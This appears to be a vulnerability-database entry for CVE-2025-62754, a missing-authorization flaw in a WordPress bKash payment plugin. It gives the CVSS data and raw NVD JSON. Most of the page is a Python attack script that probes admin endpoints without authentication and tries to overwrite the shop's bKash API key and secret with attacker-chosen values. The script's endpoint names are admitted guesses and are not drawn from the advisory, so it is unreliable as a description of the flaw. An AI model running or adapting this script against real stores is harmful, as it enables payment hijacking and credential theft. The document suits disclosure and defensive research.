Security Vulnerability Report
中文
CVE-2025-62754 CVSS 5.3 MEDIUM

CVE-2025-62754

Published: 2026-01-22 17:15:59
Last Modified: 2026-04-27 17:16:33
Source: [email protected]

Description

Missing Authorization vulnerability in Kapil Paul Payment Gateway bKash for WC woo-payment-bkash allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Payment Gateway bKash for WC: from n/a through <= 3.1.0.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

woo-payment-bkash <= 3.1.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-62754 PoC - Missing Authorization in woo-payment-bkash # This PoC demonstrates accessing admin functions without authentication import requests import json TARGET_URL = "http://target-wordpress-site.com" PLUGIN_PATH = "/wp-content/plugins/woo-payment-bkash/" # Try to access admin AJAX endpoints without authentication def test_unauthorized_access(): """ Test various endpoints that should require authentication """ # Common bKash plugin AJAX actions that might be vulnerable vulnerable_endpoints = [ f"{TARGET_URL}/wp-admin/admin-ajax.php?action=bkash_payment_settings", f"{TARGET_URL}/wp-admin/admin-ajax.php?action=bkash_get_transactions", f"{TARGET_URL}/wp-admin/admin-ajax.php?action=bkash_refund", f"{TARGET_URL}/wp-json/woo-payment-bkash/v1/settings", ] results = [] for endpoint in vulnerable_endpoints: try: # Send request without authentication cookies response = requests.get(endpoint, timeout=10) result = { "endpoint": endpoint, "status_code": response.status_code, "response_length": len(response.text), "vulnerable": False } # Check if response indicates successful unauthorized access if response.status_code == 200 and len(response.text) > 0: # Check for sensitive data exposure if any(keyword in response.text.lower() for keyword in ['settings', 'config', 'api', 'token', 'secret', 'bkash']): result["vulnerable"] = True result["sensitive_data_found"] = True results.append(result) except requests.RequestException as e: results.append({ "endpoint": endpoint, "error": str(e) }) return results # Test POST requests for unauthorized actions def test_unauthorized_post(): """ Test POST requests that should require authentication """ post_endpoints = [ f"{TARGET_URL}/wp-admin/admin-ajax.php", f"{TARGET_URL}/wp-json/woo-payment-bkash/v1/settings/update", ] results = [] for endpoint in post_endpoints: try: # Craft POST request without authentication payload = { "action": "bkash_save_settings", "bkash_api_key": "attacker_controlled_key", "bkash_api_secret": "attacker_controlled_secret" } response = requests.post(endpoint, data=payload, timeout=10) result = { "endpoint": endpoint, "status_code": response.status_code, "response": response.text[:500], "settings_modified": False } # Check if settings were modified if response.status_code == 200: if 'success' in response.text.lower() or 'updated' in response.text.lower(): result["settings_modified"] = True results.append(result) except requests.RequestException as e: results.append({ "endpoint": endpoint, "error": str(e) }) return results if __name__ == "__main__": print("CVE-2025-62754 PoC - Testing Missing Authorization in woo-payment-bkash") print("=" * 70) print("\n[1] Testing GET endpoints for unauthorized access...") get_results = test_unauthorized_access() for result in get_results: print(f"\nEndpoint: {result.get('endpoint')}") print(f"Status: {result.get('status_code')}") print(f"Vulnerable: {result.get('vulnerable', False)}") print("\n[2] Testing POST endpoints for unauthorized modifications...") post_results = test_unauthorized_post() for result in post_results: print(f"\nEndpoint: {result.get('endpoint')}") print(f"Status: {result.get('status_code')}") print(f"Settings Modified: {result.get('settings_modified', False)}") print("\n" + "=" * 70) print("PoC completed. Review results above.")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-62754", "sourceIdentifier": "[email protected]", "published": "2026-01-22T17:15:59.277", "lastModified": "2026-04-27T17:16:32.983", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in Kapil Paul Payment Gateway bKash for WC woo-payment-bkash allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Payment Gateway bKash for WC: from n/a through <= 3.1.0."}, {"lang": "es", "value": "Vulnerabilidad de autorización faltante en Kapil Paul Payment Gateway bKash para WC woo-payment-bkash permite explotar niveles de seguridad de control de acceso configurados incorrectamente. Este problema afecta a Payment Gateway bKash para WC: desde n/a hasta &lt;= 3.1.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/woo-payment-bkash/vulnerability/wordpress-payment-gateway-bkash-for-wc-plugin-3-0-0-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.